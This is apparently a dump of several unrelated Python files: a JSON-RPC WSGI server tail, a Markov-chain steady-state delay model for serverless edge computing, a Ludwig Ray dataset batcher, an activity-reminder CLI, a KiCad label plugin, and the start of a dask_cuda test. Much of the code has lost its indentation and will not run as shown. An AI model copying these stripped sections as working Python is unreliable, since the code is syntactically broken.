self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow the port number to be returned (see the commented sketch
    after stop_server below).'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
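# A minimal usage sketch for start_server/stop_server above (hedged: "MetagenomeUtilsServer"
# is an assumed module name for this file, not something defined here):
#
#     from MetagenomeUtilsServer import start_server, stop_server
#     port = start_server(newprocess=True)   # server runs in a child process
#     ...                                    # issue JSON-RPC calls against http://localhost:<port>
#     stop_server()                          # terminates the child process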
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
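# Entry point: when invoked with an input JSON-RPC file, an output file path and an
# optional token (or token file), a single request is executed via process_async_cli();
# otherwise --host/--port are parsed and the single-threaded WSGI server is started
# via start_server().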
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
steadystate.py
|
"""
Compute the steady-state delays of a serverless edge computing system
"""
__author__ = "Claudio Cicconetti"
__version__ = "0.1.0"
__license__ = "MIT"
import numpy as np
from itertools import product
import scipy.sparse as sp
from scipy.linalg import norm
import threading
import time
class DegenerateException(Exception):
"""Raised when the transition matrix is degenerate"""
pass
class SteadyStateGeneric(object):
"""Steady-state simulation object"""
def __init__(self,
verbose = False):
# configuration
self.verbose = verbose
@staticmethod
def printMat(name, mat):
"Print a matrix per row, prepending the data structure name in a separate line"
print "{}: ".format(name)
if isinstance(mat, sp.dok_matrix):
for row in mat.toarray():
print row
else:
for row in mat:
print row
################################################################################
################################################################################
################################################################################
class SteadyState(SteadyStateGeneric):
"""Steady-state delays of a serverless edge computing with two options"""
def __init__(self,
configuration,
verbose = False):
super(SteadyState, self).__init__(verbose)
# input
self.chi = configuration.chi
self.tau = configuration.tau
self.x = configuration.x
self.load = configuration.load
self.mu = configuration.mu
self.association = configuration.association
#
# derived variables
#
# lazy initialization variables
self.delta = None
self.deltabar = None
self.Q = None
self.pi = None
self.delays = None
# scalars
self.nclients = self.tau.shape[0]
self.nservers = self.tau.shape[1]
self.nstates = pow(2, self.nclients)
# possible servers for each client
possible_servers = []
for i in range(self.nclients):
server_list = []
for (ndx,s) in zip(range(self.nservers),self.association[i]):
if s == 1:
server_list.append(ndx)
assert len(server_list) == 2
possible_servers.append(server_list)
self.possible_servers = np.array(possible_servers)
# server assigned to every client per state
self.state = np.zeros([self.nclients, self.nstates], dtype=int)
self.statebar = np.zeros([self.nclients, self.nstates], dtype=int)
for ndx, prod in zip(range(self.nstates), product([0, 1], repeat=self.nclients)):
for i in range(self.nclients):
self.state[i, ndx] = self.possible_servers[i][prod[i]]
self.statebar[i, ndx] = self.possible_servers[i][1-prod[i]]
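        # Each of the 2^nclients states fixes one binary choice per client: the tuple from
        # product() selects which of the client's two associated servers currently serves it
        # (self.state) and which one it would probe if it switched (self.statebar).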
# further size checks
assert self.x.shape[0] == self.nclients
assert self.load.shape[0] == self.nclients
assert self.mu.shape[0] == self.nservers
assert self.association.shape[0] == self.nclients
assert self.association.shape[1] == self.nservers
def clear(self):
"Remove all derived data structures"
self.delta = None
self.deltabar = None
self.Q = None
self.pi = None
self.delays = None
def debugPrint(self, printDelay = False):
"Print the internal data structures"
self.printMat("Network delays", self.tau)
self.printMat("Requests", self.x)
self.printMat("Request rates", self.load)
self.printMat("Server rates", self.mu)
self.printMat("Associations", self.association)
self.printMat("Primary state", self.state)
self.printMat("Probe state", self.statebar)
self.printMat("Possible servers", self.possible_servers)
if printDelay:
self.printMat("Average delays per state (serving)", self.__delta())
self.printMat("Average delays per state (probing)", self.__deltabar())
try:
self.printMat("Steady state state transition matrix", self.transition())
self.printMat("Steady state state probabilities", self.probabilities())
self.printMat("Steady state average delays", self.steady_state_delays())
except DegenerateException:
self.clear()
def I(self, client, server, state):
"Return 1 if the client is served by server in a given state"
if self.state[client, state] == server:
return 1.0
return 0.0
def Ibar(self, client, server, state):
"Return 1 if the client is probing server in a given state"
if self.statebar[client, state] == server:
return 1.0
return 0.0
def __delta(self):
"Compute the average delays when being server"
if self.delta is not None:
return self.delta
self.delta = np.zeros([self.nclients, self.nstates])
for i in range(self.nclients):
for k in range(self.nstates):
server = self.state[i, k]
assert 0 <= server < self.nservers
numerator = self.x[i] * self.mu[server]
denominator = self.mu[server]
denominator -= self.load[i]
for h in range(self.nclients):
if h == i:
continue
denominator -= \
self.load[h] * ( self.I(h, server, k) + self.chi * self.Ibar(h, server, k) )
self.delta[i, k] = self.tau[i, server] + numerator / denominator if denominator > 0 else -1
return self.delta
def __deltabar(self):
"Compute the average delays when probing"
if self.deltabar is not None:
return self.deltabar
self.deltabar = np.zeros([self.nclients, self.nstates])
for i in range(self.nclients):
for k in range(self.nstates):
server = self.statebar[i, k]
assert 0 <= server < self.nservers
numerator = self.x[i] * self.mu[server]
denominator = self.mu[server]
denominator -= self.chi * self.load[i]
for h in range(self.nclients):
if h == i:
continue
denominator -= \
self.load[h] * ( self.I(h, server, k) + self.chi * self.Ibar(h, server, k) )
self.deltabar[i, k] = self.tau[i, server] + numerator / denominator if denominator > 0 else -1
return self.deltabar
def transition(self):
"Compute the transition matrix"
if self.Q is not None:
return self.Q
# make sure the self.delta and self.deltabar variables are initialized
self.__delta()
self.__deltabar()
# create an empty sparse matrix
self.Q = sp.dok_matrix((self.nstates,self.nstates))
# fill the sparse matrix Q with the state transition probabilities
for k in range(self.nstates):
# for every client, the possible servers to which it may go
possible_destinations = []
for i in range(self.nclients):
if self.__remain(i, k):
possible_destinations.append([self.state[i, k]])
else:
possible_destinations.append([self.state[i, k], self.statebar[i, k]])
# identify the list of possible destination states, not including itself
dest_states = []
for h in range(self.nstates):
to_be_added = True
if h == k:
to_be_added = False
else:
for i in range(self.nclients):
#if self.state[i, h] not in possible_destinations[i] or \
# self.delta[i, h] < 0:
if self.state[i, h] not in possible_destinations[i]:
to_be_added = False
break
if to_be_added:
dest_states.append(h)
# if there are no possible destinations, then k is an absorbing state,
# which should not be the case
if len(dest_states) == 0:
#for xxx in range(self.nclients):
# print "{} {} {}".format(
# self.delta[xxx, k],
# self.deltabar[xxx, k],
# possible_destinations[xxx])
raise DegenerateException("Cannot compute transition matrix with absorbing states")
# we assume any state has the same probability to be reached from this
state_prob = 1.0 / len(dest_states)
for h in dest_states:
self.Q[k, h] = state_prob
# the transition matrix has zero-sum per row
self.Q[k, k] = -1.0
return self.Q
#
# copied from the SciPy cookbook
# file: tandemqueue.py
# the method is originally called computePiMethod1()
#
# https://scipy-cookbook.readthedocs.io/items/Solving_Large_Markov_Chains.html
#
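    # The stationary vector pi solves pi * Q = 0. Uniformization rewrites the generator as
    # P = I - Q/l, with |l| chosen slightly larger than the largest exit rate to avoid
    # periodicity; then pi * P = pi, and repeatedly multiplying an initial vector by P
    # (the power method) converges to the steady-state probabilities.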
def probabilities(self):
"Compute the steady state probabilities"
if self.pi is not None:
return self.pi
# make sure the self.Q variable is initialized
self.transition()
size = self.nstates
l = min(self.Q.values())*1.001 # avoid periodicity, see trivedi's book
P = sp.eye(size, size) - self.Q/l
# compute Pi
P = P.tocsr()
self.pi = np.zeros(size)
pi1 = np.zeros(size)
        self.pi[0] = 1
n = norm(self.pi - pi1, 1)
iterations = 0
while n > 1e-3 and iterations < 1e5:
pi1 = self.pi*P
self.pi = pi1*P # avoid copying pi1 to pi
n = norm(self.pi - pi1, 1)
iterations += 1
return self.pi
def __remain(self, i, k):
"""
Return True if the client i prefers to remain when in state k.
There are different cases depending on whether the queue is stable
in the given primary or secondary state.
Primary unstable: always leave (this is _arbitrary_)
Primary stable:
- if secondary unstable: always remain
- if secondary stable: remain only if delay primary < delay secondary
"""
assert self.delta is not None
assert self.deltabar is not None
if self.delta[i, k] < 0:
return False # leave
if self.deltabar[i, k] < 0:
return True # remain
if self.deltabar[i, k] < self.delta[i, k]:
return False # leave
return True # remain
def absorbing(self):
"Return the list of absorbing states (may be empty)"
if self.delta is None:
self.__delta()
if self.deltabar is None:
            self.__deltabar()
ret = []
for k in range(self.nstates):
serving_faster = True
for i in range(self.nclients):
serving_faster &= self.__remain(i, k)
if serving_faster:
ret.append(k)
return ret
def steady_state_delays(self):
"Return the average delay per client"
if self.delays is not None:
return self.delays
# make sure the delta and state probabilities are initialized
self.__delta()
try:
self.probabilities()
self.delays = np.matmul(self.delta, self.pi)
except DegenerateException:
absorbing_states = self.absorbing()
assert len(absorbing_states) > 0
if len(absorbing_states) > 1:
# not sure if this may ever happen
print "> 1 absorbing state: {}".format(absorbing_states)
else:
print "found an absorbing state"
self.delays = np.zeros([self.nclients])
for i in range(self.nclients):
self.delays[i] = self.delta[i, absorbing_states[0]]
return self.delays
################################################################################
################################################################################
################################################################################
class SteadyStateSingle(SteadyStateGeneric):
"""Steady-state delays of a serverless edge computing with a single option"""
def __init__(self,
configuration,
verbose = False):
super(SteadyStateSingle, self).__init__(verbose)
# input
self.tau = configuration.tau
self.x = configuration.x
self.load = configuration.load
self.mu = configuration.mu
self.association = configuration.association
#
# derived variables
#
# lazy initialization variables
self.delays = None
# scalars
self.nclients = self.tau.shape[0]
self.nservers = self.tau.shape[1]
self.nstates = pow(2, self.nclients)
# possible server for each client
self.servers = np.zeros(self.nclients, dtype=int)
for i in range(self.nclients):
server_list = []
for (ndx,s) in zip(range(self.nservers),self.association[i]):
if s == 1:
server_list.append(ndx)
assert len(server_list) == 1
self.servers[i] = server_list[0]
# further size checks
assert self.x.shape[0] == self.nclients
assert self.load.shape[0] == self.nclients
assert self.mu.shape[0] == self.nservers
assert self.association.shape[0] == self.nclients
assert self.association.shape[1] == self.nservers
def clear(self):
"Remove all derived data structures"
self.delays = None
def debugPrint(self, printDelay = False):
"Print the internal data structures"
self.printMat("Network delays", self.tau)
self.printMat("Requests", self.x)
self.printMat("Request rates", self.load)
self.printMat("Server rates", self.mu)
self.printMat("Associations", self.association)
self.printMat("Possible servers", self.servers)
if printDelay:
self.printMat("Steady state average delays", self.steady_state_delays())
def steady_state_delays(self):
"Return the average delay per client"
if self.delays is not None:
return self.delays
self.delays = np.zeros([self.nclients])
# compute the total load per every server
loads = np.zeros(self.nservers)
for i,j in zip(range(self.nclients), self.servers):
loads[j] += self.load[i]
# compute average delay, use -1 if server is unstable
for i in range(self.nclients):
server = self.servers[i]
if self.mu[server] <= loads[server]:
self.delays[i] = -1.0
else:
queueing_delay = \
( self.x[i] * self.mu[server] ) / \
( self.mu[server] - loads[server] )
                self.delays[i] = self.tau[i, server] + queueing_delay
return self.delays
################################################################################
################################################################################
################################################################################
class Simulator(object):
"Run simulations using a pool of threads"
def __init__(self, single = False, nthreads = 1, verbose = False, progress = False):
"Initialize object"
# consistency checks
assert nthreads >= 1
# input
self.single = single
self.nthreads = nthreads
self.verbose = verbose
self.progress = progress
# internal data structures
self.lock = threading.Lock()
self.done = []
self.average_delays = []
def run(self, configurations):
"Run the simulations in the given list of Configuration objects"
self.configurations = configurations
self.done = [False for i in range(len(configurations))]
self.average_delays = [None for i in range(len(configurations))]
# spawn threads
threads = []
for i in range(min(self.nthreads,len(configurations))):
t = threading.Thread(target = self.__work, args=[i])
threads.append(t)
t.start()
# wait for the threads to terminate
for t in threads:
t.join()
def __work(self, tid):
"Execute a single simulation"
while True:
# find the next job, if none leave
job = None
with self.lock:
for done, ndx in zip(self.done, range(len(self.done))):
if not done:
self.done[ndx] = True
job = ndx
break
if job is None:
break
if self.single:
ss = SteadyStateSingle(self.configurations[job], self.verbose)
else:
ss = SteadyState(self.configurations[job], self.verbose)
if self.verbose:
with self.lock:
ss.debugPrint(True)
try:
now = time.time()
average_delays = ss.steady_state_delays()
with self.lock:
if self.progress:
print "thread#{}, job {}/{}, required {} s".format(tid, ndx, len(self.done), time.time() - now)
self.average_delays[job] = average_delays
except DegenerateException:
print "skipped run#{}, absorbing states: {}".format(job, ', '.join([str(y) for y in ss.absorbing()]))
|
ray.py
|
#! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import contextlib
import math
import queue
import threading
from distutils.version import LooseVersion
from functools import lru_cache
from typing import Dict, Any, Iterator
import numpy as np
import pandas as pd
import ray
from ray.data import from_dask, read_parquet
from ray.data.dataset_pipeline import DatasetPipeline
from ray.data.extensions import TensorDtype
from ludwig.constants import NAME
from ludwig.data.batcher.base import Batcher
from ludwig.data.dataset.base import Dataset, DatasetManager
from ludwig.utils.data_utils import DATA_TRAIN_HDF5_FP
from ludwig.utils.misc_utils import get_proc_features
from ludwig.utils.types import DataFrame
_ray18 = LooseVersion(ray.__version__) >= LooseVersion("1.8")
class RayDataset(Dataset):
""" Wrapper around ray.data.Dataset. """
def __init__(self, df: DataFrame, features: Dict[str, Dict], training_set_metadata: Dict[str, Any]):
self.ds = from_dask(df) if not isinstance(df, str) else read_parquet(df)
self.features = features
self.training_set_metadata = training_set_metadata
self.data_hdf5_fp = training_set_metadata.get(DATA_TRAIN_HDF5_FP)
# TODO ray 1.8: convert to Tensors before shuffle
# def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
# for c in features.keys():
# df[c] = df[c].astype(TensorDtype())
# return df
# self.ds = self.ds.map_batches(to_tensors, batch_format="pandas")
def pipeline(self, shuffle=True) -> DatasetPipeline:
pipe = self.ds.repeat()
if shuffle:
if _ray18:
pipe = pipe.random_shuffle_each_window()
else:
pipe = pipe.random_shuffle()
return pipe
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128,
should_shuffle=True,
seed=0,
ignore_last=False,
horovod=None):
yield RayDatasetBatcher(
self.ds.repeat().iter_datasets(),
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
def __len__(self):
return self.ds.count()
@property
def size(self):
return len(self)
class RayDatasetManager(DatasetManager):
def __init__(self, backend):
self.backend = backend
def create(self, dataset: DataFrame, config: Dict[str, Any], training_set_metadata: Dict[str, Any]):
return RayDataset(
dataset,
get_proc_features(config),
training_set_metadata
)
def save(
self,
cache_path: str,
dataset: DataFrame,
config: Dict[str, Any],
training_set_metadata: Dict[str, Any],
tag: str
):
self.backend.df_engine.to_parquet(dataset, cache_path)
return cache_path
def can_cache(self, skip_save_processed_input):
return not skip_save_processed_input
@property
def data_format(self):
return 'parquet'
class RayDatasetShard(Dataset):
def __init__(
self,
dataset_shard: DatasetPipeline,
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
):
self.dataset_shard = dataset_shard
self.features = features
self.training_set_metadata = training_set_metadata
self.dataset_iter = dataset_shard.iter_datasets()
@contextlib.contextmanager
def initialize_batcher(self, batch_size=128,
should_shuffle=True,
seed=0,
ignore_last=False,
horovod=None):
yield RayDatasetBatcher(
self.dataset_iter,
self.features,
self.training_set_metadata,
batch_size,
self.size,
)
@lru_cache(1)
def __len__(self):
# TODO(travis): find way to avoid calling this, as it's expensive
return next(self.dataset_iter).count()
@property
def size(self):
return len(self)
class RayDatasetBatcher(Batcher):
def __init__(
self,
dataset_epoch_iterator: Iterator[ray.data.Dataset],
features: Dict[str, Dict],
training_set_metadata: Dict[str, Any],
batch_size: int,
samples_per_epoch: int,
):
self.dataset_epoch_iterator = dataset_epoch_iterator
self.batch_size = batch_size
self.samples_per_epoch = samples_per_epoch
self.training_set_metadata = training_set_metadata
self.columns = list(features.keys())
self.reshape_map = {
proc_column: training_set_metadata[feature[NAME]].get('reshape')
for proc_column, feature in features.items()
}
self.dataset_batch_iter = None
self._epoch = 0
self._next_batch = None
self._last_batch = False
self._step = 0
self._fetch_next_epoch()
def next_batch(self):
if self.last_batch():
raise StopIteration()
batch = self._next_batch
self._fetch_next_batch()
self._step += 1
return batch
def last_batch(self):
return self._last_batch
def set_epoch(self, epoch, batch_size):
self.batch_size = batch_size
if epoch != self._epoch:
self._fetch_next_epoch()
self._epoch = epoch
@property
def step(self):
return self._step
@property
def steps_per_epoch(self):
return math.ceil(self.samples_per_epoch / self.batch_size)
def _fetch_next_epoch(self):
dataset = next(self.dataset_epoch_iterator)
read_parallelism = 1
if read_parallelism == 1:
self.dataset_batch_iter = self._create_async_reader(dataset)
elif read_parallelism > 1:
self.dataset_batch_iter = self._create_async_parallel_reader(dataset, read_parallelism)
else:
# TODO: consider removing this. doesn't work currently and read performance seems generally
# very good with 1 parallelism
self.dataset_batch_iter = self._create_sync_reader(dataset)
self._step = 0
self._fetch_next_batch()
def _fetch_next_batch(self):
if self.dataset_batch_iter is None:
self._last_batch = True
return
self._last_batch = False
try:
self._next_batch = next(self.dataset_batch_iter)
except StopIteration:
self._last_batch = True
def _to_tensors_fn(self):
columns = self.columns
def to_tensors(df: pd.DataFrame) -> pd.DataFrame:
for c in columns:
df[c] = df[c].astype(TensorDtype())
return df
return to_tensors
def _prepare_batch(self, batch: pd.DataFrame) -> Dict[str, np.ndarray]:
res = {
c: batch[c].to_numpy() for c in self.columns
}
for c in self.columns:
reshape = self.reshape_map.get(c)
if reshape is not None:
res[c] = res[c].reshape((-1, *reshape))
return res
def _create_sync_reader(self, dataset: ray.data.Dataset):
to_tensors = self._to_tensors_fn()
def sync_read():
for batch in dataset.map_batches(
to_tensors, batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=self.batch_size,
batch_format="pandas"
):
yield self._prepare_batch(batch)
return sync_read()
def _create_async_reader(self, dataset: ray.data.Dataset):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
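        # Producer/consumer hand-off: a background thread converts blocks to tensor columns
        # and pushes prepared batches into a bounded queue (maxsize=100) so dataset reads
        # overlap with training; a None sentinel marks the end of the epoch.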
def producer():
for batch in dataset.map_batches(
to_tensors,
batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=batch_size,
batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_read():
t = threading.Thread(target=producer)
t.start()
while True:
batch = q.get(block=True)
if batch is None:
break
yield batch
t.join()
return async_read()
def _create_async_parallel_reader(self, dataset: ray.data.Dataset, num_threads: int):
q = queue.Queue(maxsize=100)
batch_size = self.batch_size
to_tensors = self._to_tensors_fn()
splits = dataset.split(n=num_threads)
def producer(i):
for batch in splits[i].map_batches(
to_tensors,
batch_format="pandas"
).iter_batches(
prefetch_blocks=0,
batch_size=batch_size,
batch_format="pandas"
):
res = self._prepare_batch(batch)
q.put(res)
q.put(None)
def async_parallel_read():
threads = [threading.Thread(target=producer, args=(i,)) for i in range(num_threads)]
for t in threads:
t.start()
active_threads = num_threads
while True:
batch = q.get(block=True)
if batch is None:
active_threads -= 1
if active_threads == 0:
break
yield batch
for t in threads:
t.join()
return async_parallel_read()
|
main.py
|
#Standard library imports
import sys
from os.path import abspath, dirname
import json
import time
import threading
import multiprocessing
import platform
#Third-party imports
try:
    from pushover import init, Client
except ImportError:
    print("Please type this: pip3 install python-pushover colorama")
    sys.exit()
#My modules
from activity import Activity
#Check for amount of cores
cpu_count = multiprocessing.cpu_count()
if cpu_count < 2:
print("Sorry. This cannot run with less than 2 cores.")
sys.exit()
else:
user_os = platform.system()
if user_os == "Windows":
path = "\\"
else:
path = "/"
#Open the config json file
script = dirname(abspath(__file__))
with open(f'{script}{path}config.json') as f:
config = json.load(f)
#This stores name and stuff
with open(f'{script}{path}name.json') as f:
settings = json.load(f)
#get config stuffs for pushover
user = config.get("user_key")
api = config.get("api_key")
#Start the Pushover client
client = Client(user, api_token=api)
#Start activity class
activity = Activity()
if settings["name"] is None:
activity.get_name()
activity.greeting()
checking = threading.Thread(target=activity.check_for_act)
checking.daemon = True  #let the checker thread die with the main program so exit/quit works
checking.start()
#As a wise man once said; LETS GO!
while True:
user_input = input(">")
if user_input == "help" or user_input == "h" or user_input == "man" or user_input == "?":
activity.help()
elif user_input == "change_name":
activity.get_name()
elif user_input == "add_activity":
activity.add_activity()
elif user_input == "delete_all":
activity.delete_all()
elif user_input == "list_all":
activity.list_all()
elif user_input == "delete_one":
activity.delete_one()
elif user_input == "time" or user_input == "get_time":
activity.get_time()
elif user_input == "set_color":
activity.set_color()
elif user_input == "clear_on_start":
activity.clear_on_start()
elif user_input == "set_back":
activity.set_back()
elif user_input == "set_style":
activity.set_style()
elif user_input == "exit" or user_input == "quit":
print("Exiting. Please be aware that activities will not be notified while this is not running.")
print("idk how to stop threads")
sys.exit()
else:
print("Unknown command. Do help to learn more.")
|
__init__.py
|
import os
import sys
import subprocess
import threading
import time
import wx
import wx.aui
from wx import FileConfig
import pcbnew
from .dialog import Dialog
def check_for_bom_button():
# From Miles McCoo's blog
# https://kicad.mmccoo.com/2017/03/05/adding-your-own-command-buttons-to-the-pcbnew-gui/
def find_pcbnew_window():
windows = wx.GetTopLevelWindows()
pcbneww = [w for w in windows if "pcbnew" in w.GetTitle().lower()]
if len(pcbneww) != 1:
return None
return pcbneww[0]
def callback(_):
plugin.Run()
path = os.path.dirname(__file__)
while not wx.GetApp():
time.sleep(1)
bm = wx.Bitmap(path + '/icon.png', wx.BITMAP_TYPE_PNG)
button_wx_item_id = 0
from pcbnew import ID_H_TOOLBAR
while True:
time.sleep(1)
pcbnew_window = find_pcbnew_window()
if not pcbnew_window:
continue
top_tb = pcbnew_window.FindWindowById(ID_H_TOOLBAR)
if button_wx_item_id == 0 or not top_tb.FindTool(button_wx_item_id):
top_tb.AddSeparator()
button_wx_item_id = wx.NewId()
top_tb.AddTool(button_wx_item_id, "KiBuzzard", bm,
"Execute Buzzard script", wx.ITEM_NORMAL)
top_tb.Bind(wx.EVT_TOOL, callback, id=button_wx_item_id)
top_tb.Realize()
class KiBuzzardPlugin(pcbnew.ActionPlugin, object):
config_file = os.path.join(os.path.dirname(__file__), '..', 'config.ini')
buzzard_path = os.path.join(os.path.dirname(__file__), '..', 'deps', 'buzzard')
def __init__(self):
super(KiBuzzardPlugin, self).__init__()
self.name = "Create Labels"
self.category = "Modify PCB"
self.pcbnew_icon_support = hasattr(self, "show_toolbar_button")
self.show_toolbar_button = True
icon_dir = os.path.dirname(os.path.dirname(__file__))
self.icon_file_name = os.path.join(icon_dir, 'icon.png')
self.description = "Create Labels"
self.config = FileConfig(localFilename=self.config_file)
self._pcbnew_frame = None
def defaults(self):
pass
def Run(self):
buzzard_script = os.path.join(self.buzzard_path, 'buzzard.py')
if self._pcbnew_frame is None:
self._pcbnew_frame = [x for x in wx.GetTopLevelWindows() if 'pcbnew' in x.GetTitle().lower() and not 'python' in x.GetTitle().lower()][0]
        def run_buzzard(label_str):
            import re
            label_str = label_str + ' -o ki -stdout'
            args = [a.strip('"') for a in re.findall(r'".+?"|\S+', label_str)]
# Execute Buzzard
process = None
if sys.platform.startswith('linux'):
process = subprocess.Popen(['python', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
process = subprocess.Popen(['python3.exe', buzzard_script] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout, stderr = process.communicate()
if stderr:
wx.MessageBox(stderr, 'Error', wx.OK | wx.ICON_ERROR)
# check for errors
error_line = [s for s in stderr.decode('utf8').split('\n') if 'error' in s]
if len(error_line) > 0:
wx.MessageBox(error_line[0], 'Error', wx.OK | wx.ICON_ERROR)
else:
# Copy footprint into clipboard
if sys.platform.startswith('linux'):
clip_args = ['xclip', '-sel', 'clip', '-noutf8']
else:
clip_args = ['clip.exe']
process = subprocess.Popen(clip_args, stdin=subprocess.PIPE)
process.communicate(stdout)
dlg.EndModal(wx.ID_OK)
dlg = Dialog(self._pcbnew_frame, self.config, self.buzzard_path, run_buzzard)
try:
if dlg.ShowModal() == wx.ID_OK:
# Set focus to main window and execute a Paste operation
self._pcbnew_frame.Raise()
wx.Yield()
keyinput = wx.UIActionSimulator()
keyinput.Char(ord("V"), wx.MOD_CONTROL)
finally:
self.config.Flush()
dlg.Destroy()
plugin = KiBuzzardPlugin()
plugin.register()
# Add a button the hacky way if plugin button is not supported
# in pcbnew, unless this is linux.
if not plugin.pcbnew_icon_support and not sys.platform.startswith('linux'):
t = threading.Thread(target=check_for_bom_button)
t.daemon = True
t.start()
|
test_explicit_comms.py
|
import multiprocessing as mp
import pytest
from distributed import Client
from distributed.deploy.local import LocalCluster
from dask_cuda.explicit_comms import CommsContext, dataframe_merge
import pandas as pd
import dask.dataframe as dd
import numpy as np
import cudf
import cupy
mp = mp.get_context("spawn")
ucp = pytest.importorskip("ucp")
# Notice: all of the following tests are executed in a new process so
# that the UCX options of the different tests don't conflict.
